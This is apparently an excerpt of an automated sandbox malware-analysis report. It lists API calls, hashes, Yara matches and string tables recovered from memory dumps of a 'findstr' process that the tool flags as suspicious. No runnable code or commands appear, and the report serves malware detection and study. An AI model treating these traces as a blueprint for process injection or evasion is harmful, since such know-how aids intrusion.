                                                Yara matches
                                                Similarity
                                                • API ID: Initialize
                                                • String ID: @J7<
                                                • API String ID: 2538663250-2016760708
                                                • Opcode ID: 072e07a5cafbfdd79b57ccefc65c6c0b7f00207ec08500d05d849c139cc27c62
                                                • Instruction ID: 5ac9887653ea8f902ea2add9b78425dc25f5860a15fdae808086dca42233f284
                                                • Opcode Fuzzy Hash: 072e07a5cafbfdd79b57ccefc65c6c0b7f00207ec08500d05d849c139cc27c62
                                                • Instruction Fuzzy Hash: 1E3141B5A10209AFDB00DFD8C8809EFB7B9FF89304B148559E905EB214D775EE05CBA0
                                                APIs
                                                • CoInitialize.OLE32(00000000), ref: 02E5ECC7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2e40000_findstr.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Initialize
                                                • String ID: @J7<
                                                • API String ID: 2538663250-2016760708
                                                • Opcode ID: 432c1248411d2c46a7a68ea5f9584823acfea610344e747d4852579c4b4f43ea
                                                • Instruction ID: 43f8bc82490b71d613b851663c6518d485419788424124c59de8e67c2091d3cf
                                                • Opcode Fuzzy Hash: 432c1248411d2c46a7a68ea5f9584823acfea610344e747d4852579c4b4f43ea
                                                • Instruction Fuzzy Hash: 1C3121B5A106099FDB00DFD8D8809EEB7B9BF89304B148559E905EB214D775EE058BA0
                                                APIs
                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02E545A2
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2e40000_findstr.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Load
                                                • String ID:
                                                • API String ID: 2234796835-0
                                                • Opcode ID: e987e27dd546413dec91a427c27747d2880c049e74be4f6c88ff9a713a06d772
                                                • Instruction ID: 666b9d817b6333233fc41ef22dd1b52a79febfe1e0d999b8eebe021eb2ff28ec
                                                • Opcode Fuzzy Hash: e987e27dd546413dec91a427c27747d2880c049e74be4f6c88ff9a713a06d772
                                                • Instruction Fuzzy Hash: 5921CDB79902097BDB01CDA8DC82FEEB7A5EB4124CF009158EC05DB282D732D506CBE1
                                                APIs
                                                • WSAStartup.WS2_32(00000202,?), ref: 02E51A44
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2e40000_findstr.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Startup
                                                • String ID:
                                                • API String ID: 724789610-0
                                                • Opcode ID: efe2ae9c840dc0840b97880b9e7c1ad82d77ad3d0c0106f58419868fa5984e9a
                                                • Instruction ID: eb0c536ac7ed5d99775d90f3bc69da13eed219ad7a3560bdd05cfb486c020493
                                                • Opcode Fuzzy Hash: efe2ae9c840dc0840b97880b9e7c1ad82d77ad3d0c0106f58419868fa5984e9a
                                                • Instruction Fuzzy Hash: 27113471D81319AFCB01DBE48C81BEEB7B8AF09340F045156E908F7241E7746A448BEA
                                                APIs
                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02E545A2
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2e40000_findstr.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Load
                                                • String ID:
                                                • API String ID: 2234796835-0
                                                • Opcode ID: 57b256dc90908556de02122e3e008531c90e9e31a9dfdb2c76c4b937d2b6b965
                                                • Instruction ID: deaa4a4ce7233c2e3645c258fea1e3d59acd81ce5afe557a3d1d1a5afcc3157e
                                                • Opcode Fuzzy Hash: 57b256dc90908556de02122e3e008531c90e9e31a9dfdb2c76c4b937d2b6b965
                                                • Instruction Fuzzy Hash: 9A014CB5D8020DBBDB10DAA4DC45FEDB3B9AB44208F0081A4A908A7281F631E748CB91
                                                APIs
                                                • CreateProcessInternalW.KERNELBASE(02E51030,02E51058,02E50E30,00000000,02E57E13,00000010,02E51058,?,?,00000044,02E51058,00000010,02E57E13,00000000,02E50E30,02E51058), ref: 02E684F0
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2e40000_findstr.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateInternalProcess
                                                • String ID:
                                                • API String ID: 2186235152-0
                                                • Opcode ID: 75925144f251256c48620b1f1186ad58dd416a803079d16763daa8f225b138dc
                                                • Instruction ID: cfd781f3d5414d7169ec104fdee810f9ad0a54fc5641f8f9a1d1f4abe39860b8
                                                • Opcode Fuzzy Hash: 75925144f251256c48620b1f1186ad58dd416a803079d16763daa8f225b138dc
                                                • Instruction Fuzzy Hash: 1201C0B2204208BBCB44DF99DC80EEB77ADAF8C754F519108BA09E3240DA30F851CBA4
                                                APIs
                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02E49812
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2e40000_findstr.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateThread
                                                • String ID:
                                                • API String ID: 2422867632-0
                                                • Opcode ID: f881a9c6838bd57fa3c4755ee97b3e458390389975197965264650576da4c448
                                                • Instruction ID: 9570ec6c6c66d53fea1c2859ca205fa306319f11b765d068f276a29dc51f988a
                                                • Opcode Fuzzy Hash: f881a9c6838bd57fa3c4755ee97b3e458390389975197965264650576da4c448
                                                • Instruction Fuzzy Hash: D7F065333C031436D73065A9AC02FEB725D8B80BB5F198425F60DEB1C1D991B40146E5
                                                APIs
                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02E49812
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2e40000_findstr.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateThread
                                                • String ID:
                                                • API String ID: 2422867632-0
                                                • Opcode ID: 19906642e3035405cd5c830cdc5250707211b6d5a88c3a47cf0cd11cfbee1bcc
                                                • Instruction ID: 76ab0813ca081fbbdacdddf71125493e08c2404faf15661775def8e9205cb9c4
                                                • Opcode Fuzzy Hash: 19906642e3035405cd5c830cdc5250707211b6d5a88c3a47cf0cd11cfbee1bcc
                                                • Instruction Fuzzy Hash: 5DF0E5333C030036D23075999C02FEB226D8F80BA0F598518F60CEA1C1DA6674018AA4
                                                APIs
                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02E49812
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2e40000_findstr.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CreateThread
                                                • String ID:
                                                • API String ID: 2422867632-0
                                                • Opcode ID: 48bfa06585e4a829aa7e7fe506319ac195018004edc39e94c7679dad41e675b6
                                                • Instruction ID: 74884da60728e074b3d9c78e4f8d8c35844d03a1f7d78cb3968df7bc6d707f78
                                                • Opcode Fuzzy Hash: 48bfa06585e4a829aa7e7fe506319ac195018004edc39e94c7679dad41e675b6
                                                • Instruction Fuzzy Hash: 60E086733C070026E232616C9C02FAB619D9B80B55F298529F30AEF2C2DE95B4020694
                                                APIs
                                                • RtlAllocateHeap.NTDLL(02E51799,?,02E64B0F,02E51799,02E64727,02E64B0F,?,02E51799,02E64727,00001000,?,?,02E69C50), ref: 02E683EF
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2e40000_findstr.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: e87ef4bac42e6c86340b279ddb217ac5fed7b9462247c58aa44df4a450922197
                                                • Instruction ID: 7be5acdf086bd265686cb4bd97b35e4346ad6310ef4558b744a9901e2298f2fb
                                                • Opcode Fuzzy Hash: e87ef4bac42e6c86340b279ddb217ac5fed7b9462247c58aa44df4a450922197
                                                • Instruction Fuzzy Hash: 34E065762402087FDA10EE59DC48FAB73ADEFC9750F408408F908A7241DB31B9108AB4
                                                APIs
                                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,550305C2,00000007,00000000,00000004,00000000,02E53E05,000000F4,?,?,?,?,?), ref: 02E6843F
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2e40000_findstr.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FreeHeap
                                                • String ID:
                                                • API String ID: 3298025750-0
                                                • Opcode ID: e7214976f619b748219cd2fa71ca53e767825fd315e4bba5c138d2cf3527078b
                                                • Instruction ID: 9be242219e0fdd7e7b721b45af5a2b3e7cbe9824f05dfb12fd91636cd7628a59
                                                • Opcode Fuzzy Hash: e7214976f619b748219cd2fa71ca53e767825fd315e4bba5c138d2cf3527078b
                                                • Instruction Fuzzy Hash: 03E06D712443047BC610EE59DC44FAB73ADEFC9754F004018F908A7241C771B910CAB4
                                                APIs
                                                • SetErrorMode.KERNELBASE(00008003,?,?,02E51A80,02E66E47,02E64727,?), ref: 02E57C91
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2e40000_findstr.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorMode
                                                • String ID:
                                                • API String ID: 2340568224-0
                                                • Opcode ID: 75f06d49755477454b4085bd0923f900f3e1d1f16c99366c230924b8cce6adef
                                                • Instruction ID: 9d162ff064af68663b3be3757aaea409ec20f9604aa68e0a5f7eedc9380c255a
                                                • Opcode Fuzzy Hash: 75f06d49755477454b4085bd0923f900f3e1d1f16c99366c230924b8cce6adef
                                                • Instruction Fuzzy Hash: 64D05E726C03043BFA40AAA4DC06F5A328E8B04A98F499464F90CDF6C2ED52F5104565
                                                APIs
                                                • GetFileAttributesW.KERNELBASE ref: 02E57E7A
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3923813236.0000000002E40000.00000040.80000000.00040000.00000000.sdmp, Offset: 02E40000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_2e40000_findstr.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AttributesFile
                                                • String ID:
                                                • API String ID: 3188754299-0
                                                • Opcode ID: 564aa035bb14cd579d8a35bac1d316f849c36bbd2026ac6a66d21791aefd520a
                                                • Instruction ID: 525ec169da3d2bf43fdf6ab5f9248ce593c930a2092e5f432cf8b208cb3a1e63
                                                • Opcode Fuzzy Hash: 564aa035bb14cd579d8a35bac1d316f849c36bbd2026ac6a66d21791aefd520a
                                                • Instruction Fuzzy Hash: DAC012312A012804EA2005EC7C483A273488B8332CB186A95A82CAA4E0C63298A69000
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3925215501.0000000003650000.00000040.00001000.00020000.00000000.sdmp, Offset: 03650000, based on PE: true
                                                 • Associated: 00000007.00000002.3925215501.0000000003779000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000007.00000002.3925215501.000000000377D000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000007.00000002.3925215501.00000000037EE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_3650000_findstr.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 57f2d76d4a5700629f0266d00578743e8d7767406c8168440aed7bb715cc66ff
                                                • Instruction ID: 38c9619ba16b58b4729537898405cdc17b26d6926504aed55d8fdf2cab2b87b2
                                                • Opcode Fuzzy Hash: 57f2d76d4a5700629f0266d00578743e8d7767406c8168440aed7bb715cc66ff
                                                • Instruction Fuzzy Hash: 92B09B71D015D5C5DE51E760470C7177914A7D1701F1DC465D2030751F4779C5D1E175
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3925100833.0000000003490000.00000040.00000800.00020000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_3490000_findstr.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                • API String ID: 0-3754132690
                                                • Opcode ID: fd3712b3bfd487199239d5500132267c023e4877587cfa18c35df2fde8904628
                                                • Instruction ID: 318a4b318a945025e91e641a8e2c7b5e9f914551fb5426a2d14560ac730845af
                                                • Opcode Fuzzy Hash: fd3712b3bfd487199239d5500132267c023e4877587cfa18c35df2fde8904628
                                                • Instruction Fuzzy Hash: 50A152F04083948AC7198F58A0552AFFFB5EBC6305F1581ADE6E6BB243C37E8905CB95
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3925100833.0000000003490000.00000040.00000800.00020000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_3490000_findstr.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: "">7$43 ;$9={r$;&}g$;=<}$>7}c$>;97$>;97$>>3}$ae|g$c`r$c|`r$e|br$e|ga$g|br$}kga
                                                • API String ID: 0-3696260499
                                                • Opcode ID: ef385a0a1ccb649719418f2f33c95e721cf96fd19a481a83203e0645119b2af0
                                                • Instruction ID: 6300fb8bed7d41c89dbfdf4918ce0fe9ff600606db9ad6642510cf543457d777
                                                • Opcode Fuzzy Hash: ef385a0a1ccb649719418f2f33c95e721cf96fd19a481a83203e0645119b2af0
                                                • Instruction Fuzzy Hash: 9A3143B580474CEEDB14CF95D281ADEBB71FB05344F90815AE8096B384C7758659CB8A
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3925215501.0000000003650000.00000040.00001000.00020000.00000000.sdmp, Offset: 03650000, based on PE: true
                                                 • Associated: 00000007.00000002.3925215501.0000000003779000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000007.00000002.3925215501.000000000377D000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000007.00000002.3925215501.00000000037EE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_3650000_findstr.jbxd
                                                Similarity
                                                • API ID: ___swprintf_l
                                                • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                • API String ID: 48624451-2108815105
                                                • Opcode ID: 0dbf48ef8bc33eb4d87427b7d51fc2cab31a8b1fbebb7780e86f292300d0fb18
                                                • Instruction ID: ecbc558bc220452e9326adbb5ca97c4f61aeebf55502e5adcbd04ac04b1e5f7d
                                                • Opcode Fuzzy Hash: 0dbf48ef8bc33eb4d87427b7d51fc2cab31a8b1fbebb7780e86f292300d0fb18
                                                • Instruction Fuzzy Hash: 1751E7B6A10256BFCF10DF99C99097EF7B8FB08200B54856DE969D7741D234DE048BE0
                                                Strings
                                                • CLIENT(ntdll): Processing section info %ws..., xrefs: 036F4787
                                                • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 036F46FC
                                                • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 036F4725
                                                • Execute=1, xrefs: 036F4713
                                                • ExecuteOptions, xrefs: 036F46A0
                                                • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 036F4742
                                                • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 036F4655
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3925215501.0000000003650000.00000040.00001000.00020000.00000000.sdmp, Offset: 03650000, based on PE: true
                                                 • Associated: 00000007.00000002.3925215501.0000000003779000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000007.00000002.3925215501.000000000377D000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000007.00000002.3925215501.00000000037EE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_3650000_findstr.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                • API String ID: 0-484625025
                                                • Opcode ID: c262174c3d35815e02aa4a5e76113a87eb9e03d58019dea38e98f1ccab30ee6e
                                                • Instruction ID: 0192131964a69e3074a2c013c3069c09561a33c0325778dcafbf7294c0f62a10
                                                • Opcode Fuzzy Hash: c262174c3d35815e02aa4a5e76113a87eb9e03d58019dea38e98f1ccab30ee6e
                                                • Instruction Fuzzy Hash: 11510735A00319AFDF21EBA5DD99FFE73B8EF49300F0400A9D505AB291EB719A918F54
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3925215501.0000000003650000.00000040.00001000.00020000.00000000.sdmp, Offset: 03650000, based on PE: true
                                                 • Associated: 00000007.00000002.3925215501.0000000003779000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000007.00000002.3925215501.000000000377D000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000007.00000002.3925215501.00000000037EE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_3650000_findstr.jbxd
                                                Similarity
                                                • API ID: __aulldvrm
                                                • String ID: +$-$0$0
                                                • API String ID: 1302938615-699404926
                                                • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                • Instruction ID: 35dfe9c5118c3164228ed2a9b4871c710075c0a180abe5ffe7730b5ce398d2c1
                                                • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                • Instruction Fuzzy Hash: 6C81DE30E222C99ADF24CE69CA967FEBBB5EF45310F1C415ED861A73D1C73488518B64
                                                Strings
                                                • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 036F02BD
                                                • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 036F02E7
                                                • RTL: Re-Waiting, xrefs: 036F031E
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3925215501.0000000003650000.00000040.00001000.00020000.00000000.sdmp, Offset: 03650000, based on PE: true
                                                 • Associated: 00000007.00000002.3925215501.0000000003779000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000007.00000002.3925215501.000000000377D000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000007.00000002.3925215501.00000000037EE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_3650000_findstr.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u$RTL: Re-Waiting
                                                • API String ID: 0-2474120054
                                                • Opcode ID: dcc7df1d9107830c981f1ac5ecd141f10809570331f6a2848d7b1f3c2544a8ef
                                                • Instruction ID: b7be020544823c9c4be6516f7e130ad8bd84bbfb1d7b18a27791ad59ed6ce646
                                                • Opcode Fuzzy Hash: dcc7df1d9107830c981f1ac5ecd141f10809570331f6a2848d7b1f3c2544a8ef
                                                • Instruction Fuzzy Hash: 2EE1BB31608B419FD725CF28C984B2ABBE0BB89324F184A6DF5A58B3E1D774D845CB52
                                                Strings
                                                • RTL: Re-Waiting, xrefs: 036F7BAC
                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 036F7B7F
                                                • RTL: Resource at %p, xrefs: 036F7B8E
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3925215501.0000000003650000.00000040.00001000.00020000.00000000.sdmp, Offset: 03650000, based on PE: true
                                                 • Associated: 00000007.00000002.3925215501.0000000003779000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000007.00000002.3925215501.000000000377D000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000007.00000002.3925215501.00000000037EE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_3650000_findstr.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 0-871070163
                                                • Opcode ID: 8904bc93e45b709f007daecd62194c6acbc2a4ae1bcb192fbf723ece88ff9c8a
                                                • Instruction ID: 373e3e4b5677f9f00f0c80b08e1bdf4a8464f894eb0d386669b50b0584828a0d
                                                • Opcode Fuzzy Hash: 8904bc93e45b709f007daecd62194c6acbc2a4ae1bcb192fbf723ece88ff9c8a
                                                • Instruction Fuzzy Hash: F941E2357047029FD724CE25C940BAAB7F9EF89710F040A2DE95A9B380DB71E845CF95
                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 036F728C
                                                Strings
                                                • RTL: Re-Waiting, xrefs: 036F72C1
                                                • RTL: Acquire Shared Sem Timeout %d(%I64u secs), xrefs: 036F7294
                                                • RTL: Resource at %p, xrefs: 036F72A3
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3925215501.0000000003650000.00000040.00001000.00020000.00000000.sdmp, Offset: 03650000, based on PE: true
                                                 • Associated: 00000007.00000002.3925215501.0000000003779000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000007.00000002.3925215501.000000000377D000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000007.00000002.3925215501.00000000037EE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_3650000_findstr.jbxd
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 885266447-605551621
                                                • Opcode ID: 0996899eaeca102b32df2211a22bf3b45d6b3e1befb180f1c7519acc070dc0aa
                                                • Instruction ID: f6a68b19c42bb2430c69520d49d578288f2362a10c431e147e856adc4ec9c604
                                                • Opcode Fuzzy Hash: 0996899eaeca102b32df2211a22bf3b45d6b3e1befb180f1c7519acc070dc0aa
                                                • Instruction Fuzzy Hash: EF41DF36700206AFD720DE25CD41FAAB7A5FF84750F180629F955AB380DB21E8528BE5
                                                APIs
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3925215501.0000000003650000.00000040.00001000.00020000.00000000.sdmp, Offset: 03650000, based on PE: true
                                                 • Associated: 00000007.00000002.3925215501.0000000003779000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000007.00000002.3925215501.000000000377D000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000007.00000002.3925215501.00000000037EE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_3650000_findstr.jbxd
                                                Similarity
                                                • API ID: __aulldvrm
                                                • String ID: +$-
                                                • API String ID: 1302938615-2137968064
                                                • Opcode ID: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                • Instruction ID: b084cec2e2f8a13d48cecb8e274aba8d9a59b88013d42bf3c42a3732b328cf5d
                                                • Opcode Fuzzy Hash: 0e72ee8b5e9315034f2b46ff5b251d52fedc42f24a18d50ff17db184198f4ea1
                                                • Instruction Fuzzy Hash: D991AE71E2029A9FDB24DE69C991ABEB7A5EF44320F18451EE875E73C0E7309941CF60
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3925215501.0000000003650000.00000040.00001000.00020000.00000000.sdmp, Offset: 03650000, based on PE: true
                                                 • Associated: 00000007.00000002.3925215501.0000000003779000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000007.00000002.3925215501.000000000377D000.00000040.00001000.00020000.00000000.sdmp
                                                 • Associated: 00000007.00000002.3925215501.00000000037EE000.00000040.00001000.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_3650000_findstr.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: $$@
                                                • API String ID: 0-1194432280
                                                • Opcode ID: 21bc14e5008a4628ec43148fca207e7002807f6c12931a7807176a155ee14393
                                                • Instruction ID: 273566e3ed7de0f195612d914144b98e12c92a16d9f34fb895906fde3c2f90b0
                                                • Opcode Fuzzy Hash: 21bc14e5008a4628ec43148fca207e7002807f6c12931a7807176a155ee14393
                                                • Instruction Fuzzy Hash: A0815A75D012699BDB31DF54CD54BEEBBB8AB08700F0446EAE919B7240D7309E85CFA4
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.3925100833.0000000003490000.00000040.00000800.00020000.00000000.sdmp, Offset: 03490000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_3490000_findstr.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: "5$7}1<$_ ib$ib!Y
                                                • API String ID: 0-3399154490
                                                • Opcode ID: 4beeb8cc7fad709d1e000d35246fbba4deb8ccaf8f72f4edc2e34c1891231e9c
                                                • Instruction ID: a6cfe0b5281e716e8dd3d0973a1f354605575a31718540c9ce9878b860b22f4b
                                                • Opcode Fuzzy Hash: 4beeb8cc7fad709d1e000d35246fbba4deb8ccaf8f72f4edc2e34c1891231e9c
                                                • Instruction Fuzzy Hash: 28F0A030118B888ADB04BF10C00865ABBD1FB8930CF440A9EE8C9DA251DA78C241C74A